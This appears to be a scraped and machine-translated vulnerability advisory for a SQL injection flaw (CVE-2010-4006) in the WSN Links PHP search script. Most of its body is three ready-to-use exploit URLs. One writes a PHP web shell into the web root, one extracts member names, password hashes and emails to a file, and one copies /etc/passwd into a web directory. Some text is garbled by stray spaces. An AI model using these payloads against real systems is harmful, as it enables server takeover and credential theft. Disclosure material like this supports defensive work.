WSN Links SQL injection vulnerability-vulnerability warning-the black bar safety net

2010-11-26T00:00:00
ID MYHACK58:62201028423
Type myhack58
Reporter 佚名
Modified 2010-11-26T00:00:00

Description

WSN Links is an advanced PHP-based/MySQL search script, WSN Links < 6.0.1,< 5.1.51;, < 5.0.81 version of the search. php file existsSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ 'WSN Links' SQL Injection Vulnerability (CVE-2 0 1 0-4 0 0 6) Mark Stanislav - mark.stanislav@gmail.com

[+]poc: ~~~~~~~~~ 1) A 'UNION SELECT' which results in a PHP shell-execution script http://example.com/search.php?namecondition=IS%20NULL))%20UNION%2 0((SELECT%2 0"<? php%20system($_REQUEST[cmd]);%2 0?& gt;"%20INTO%20OUTFILE&namesearch=/var/www/exec. php&action=filter&filled=1&whichtype=categories

2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%2 0((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass. txt&action=filter&filled=1&whichtype=categories

3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%2 0((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd. txt&action=filter&filled=1&whichtype=categories

[+]Reference: ~~~~~~~~~ http://www.wsnlinks.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006 http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/